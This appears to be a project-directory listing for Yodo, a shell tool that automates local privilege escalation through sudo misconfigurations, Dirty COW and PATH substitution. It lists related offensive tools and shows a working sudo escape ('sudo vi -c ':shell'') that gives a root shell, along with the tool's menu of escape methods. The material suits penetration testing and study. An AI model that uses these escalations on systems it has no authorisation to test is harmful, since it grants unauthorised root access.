b3rito / Yodo
Licence: gpl-3.0
Local Privilege Escalation
Stars: ✭ 203
Programming Languages
shell
77523 projects
Projects that are alternatives of or similar to Yodo
Active Directory Exploitation Cheat Sheet
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
Stars: ✭ 870 (+328.57%)
Mutual labels: privilege-escalation
Winpwn
Automation for internal Windows Penetrationtest / AD-Security
Stars: ✭ 1,303 (+541.87%)
Mutual labels: privilege-escalation
Proton
Proton Framework is a Windows post-exploitation framework similar to other Windows post-exploitation frameworks. The major difference is that the Proton Framework does most of its operations using Windows Script Host, with compatibility in the core to support a default installation of Windows 2000 with no service packs all the way through Windows 10.
Stars: ✭ 142 (-30.05%)
Mutual labels: privilege-escalation
Privesccheck
Privilege Escalation Enumeration Script for Windows
Stars: ✭ 1,032 (+408.37%)
Mutual labels: privilege-escalation
Phpsploit
Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
Stars: ✭ 1,188 (+485.22%)
Mutual labels: privilege-escalation
Active Directory Exploitation Cheat Sheet
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
Stars: ✭ 1,392 (+585.71%)
Mutual labels: privilege-escalation
Msdat
MSDAT: Microsoft SQL Database Attacking Tool
Stars: ✭ 621 (+205.91%)
Mutual labels: privilege-escalation
Pe Linux
Linux Privilege Escalation Tool By WazeHell
Stars: ✭ 168 (-17.24%)
Mutual labels: privilege-escalation
Juicy Potato
A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.
Stars: ✭ 1,276 (+528.57%)
Mutual labels: privilege-escalation
Awesome Hacking Resources
A collection of hacking / penetration testing resources to make you better!
Stars: ✭ 11,466 (+5548.28%)
Mutual labels: privilege-escalation
Sudo killer
A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo for linux privilege escalation.
Stars: ✭ 1,073 (+428.57%)
Mutual labels: privilege-escalation
Kernel Exploits
My proof-of-concept exploits for the Linux kernel
Stars: ✭ 1,173 (+477.83%)
Mutual labels: privilege-escalation
Pytmipe
Python library and client for token manipulations and impersonations for privilege escalation on Windows
Stars: ✭ 104 (-48.77%)
Mutual labels: privilege-escalation
Mida Multitool
Bash script purposed for system enumeration, vulnerability identification and privilege escalation.
Stars: ✭ 144 (-29.06%)
Mutual labels: privilege-escalation
Oscp
Collection of things made during my OSCP journey
Stars: ✭ 709 (+249.26%)
Mutual labels: privilege-escalation
Delete2system
Weaponizing for Arbitrary Files/Directories Delete bugs to Get NT AUTHORITY\SYSTEM
Stars: ✭ 95 (-53.2%)
Mutual labels: privilege-escalation
Privilege Escalation
This cheasheet is aimed at the CTF Players and Beginners to help them understand the fundamentals of Privilege Escalation with examples.
Stars: ✭ 2,117 (+942.86%)
Mutual labels: privilege-escalation
Linux Smart Enumeration
Linux enumeration tool for pentesting and CTFs with verbosity levels
Stars: ✭ 1,956 (+863.55%)
Mutual labels: privilege-escalation
yodo
This tool proves how easy it is to become root via limited sudo permissions, via dirty COW or using Pa(th)zuzu.
dirty COW : exploits a race condition in the implementation of the copy-on-write mechanism Link : https://dirtycow.ninja
Pa(th)zuzu : Checks for PATH substitution vulnerabilities, logs the commands executed by the vulnerable executables and injects commands with the permissions of the owner of the process (SUID) Link : https://github.com/ShotokanZH/Pa-th-zuzu
Extra features
VSP : checks if the user is able to overwrite a sudo-enabled command with his own
History : checks for * history (like bash_history) files. You could be lucky!
b3 : tries to substitute commands that has root privileges [sudo -l >>> User may run the following commands ... (root) NOPASSWD: /path/to/script]
Example: If a user has sudo privileges only on vi, he could become root by runnuing this command: sudo vi -c ':shell'
[email protected] ~/Desktop $ sudo vi -c ':shell'
[sudo] password for b3rito:
victim Desktop # whoami
root
Author
Written by b3rito at mes3hacklab
Installation
chmod +x yodo.sh
Usage
./yodo.sh
[email protected] ~/Desktop $ ./yodo.sh
=======================================================================
....
.. .77.
Z. ,77?
.Z$.....,?+?.
.... $?Z.77+??I..
.7I. .....~.77:=I..Z.....
.77? ..7?.?.=7....ZO..~..
.. ..7$7.=7I$.??+.$$~.==.??.. .~..
.$Z$..Z...77.$7..+=?,.I?=.++.+~....?7... ..
..?.I7:..77....$$IO++??=...7$.Z$..7$?..7$
.77.+:$?7..Z$.?,.~M,?,..77. .ZZ...,,.$77..
..$=. +7$7...77+$I? ???M.$.I:~I?..,$..7$.Z7=.
..Z7Z.=..~,.....,=O...~MI=~=...O$.~...?7..:$7I.
...Z.Z.?I?.=:.??...??..M.ZZ.. ,.~Z$I,.,7...I.,....
..,......:.~~.?.?+..?~7M..,?...==.~7..:.Z$+.. ....
.?7..??,...Z.=?:.I7..M. D$Z?$+=.:... +Z+,....77.....
.$~...:+O7$.+I+$=~:.=...7,:M.M~7 ..Z$..+~:?...7?$.?$~.OZZ$Z...
..$I7=?I?,..7?$$M..=:..?...MM.7$,.7...:??....,7I...?..Z$Z$$$.
...,=~.?.+.7.....8.$...?,+~MD+I...$7.I.O$Z$.. D8..I=$:$,....
.$~+$....7Z.$$$7M.?+=$..,M8 .Z.I., M,ZZZ.MM..7+?+77..7..
.. ...$.MM.....MZ$~Z:Z,MM.O$,$7,MZ .NMM.~77.+?+.7...
I7~Z....MM .M7Z....?MMO,Z..$.M 8MM ..=77I=~?..I~.
.$7I7?.+...$...:MMM. .$=OMM?Z,,..MMMMMMMMMMMMMI..=Z$+...
..?7I$$I.+.O:Z,=.8MN.$??MMM..$7.MMM...Z.$.+,?.Z.Z=..$77$..
...?OMMMMMMDMM7$IMMM ..MMM..,$7.Z$Z..??I$,Z.?I...
7?:++.??=...~8D..MMM MMMM.???.$...~$.....$Z..7$..
.....??,::Z$::MM.MMMMMM,,=II?II,..... ...... ..
,...?:...IOOO8OO8 ?I,: ,.
. 88OOOO. :.
.:,,,:,.8OOOO :.
.,....,. OO8M:.. :.
..... . 8OMN.:.
.ONM8::.
:8MDO 8MDO :8MDO, DMO8M :8MDO,
DMO DMO .+8D MO, DMO 8M .+8D MO,
O O $O OMM DMO 8M $O OMM
:8MDO .OO O8 DMO 8M .OO O8M,
DMO .8°O88 DMO8M .8°O88
.8OOOO. . :.
... OOOOO,.
.. . ...... .........,.MMMMMMI.,........... .
. .. ,INMMMMMMMMMMMMMMMMMMIZMMMMMMMN7=..... . . . ..
. =. ......~?ZMMMIM.MM NMMN... .......=+ . .
. .. . .$...MM,.MM ..MD....MMMMO... .. ..,..~
, . . :MM. MM .ZMM?.. .$M...7MD77ZD+.,.
. . :=D7Z8MM. .M: .. .MD.. .7D~. ..,.O. ..
.. $..=. ?M?. .. .M. ..M...IMM .,..M .. ..:..
. ..... . .MM.Z D ,M+. . :+..M. N+ . . ..? . ....
.M7=.+.=.~.:MM. . , . .M.. . ,.
.N?.8. ~ ..,M 8. ... . M. . M. . . .
. ..NM .$.. .MM... . ,+.:: 8 .
. =M.M ..?.. ..M M . . .M .I,.M.
,~~ . .I...8.. M M .8,. Z.... b3
. +. +. .. : .M....O. ... . D.=.
O. .~, $. 8 . .~. ..+ .
8. ... M. ,.. , + .I.. .,..7
O. . I I .. . . ....
+. . : .M.
. . M
.. . ..
. .
~. N.
=======================================================================
Possible options (‡ excluded):
[·] find
[·] vi
[·] b3
Select From the menu:
1) Find 8) Man * 17) Pathzuzu °‡
2) AWK 10) Dirty COW °‡ 18) History °‡
3) Nmap 11) Gdb 19) Vim
4) Vi 12) Ruby 20) Lua
5) Python 13) b3 21) Ftp *
6) Irb 14) Perl 22) Credits
7) Less * 15) Tee 23) Update
8) More * 16) VSP °‡ 99) Exit
VSP = Vulnerable Script Permissions
Pathzuzu = SUID exploitation through Path vulnerability
b3 = editable root privileged commands listed in 'sudo -l'
* user interatcion
° sudo not required
Enter Number: 1
[sudo] password for b3rito:
victim Desktop # whoami
root
victim Desktop #
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].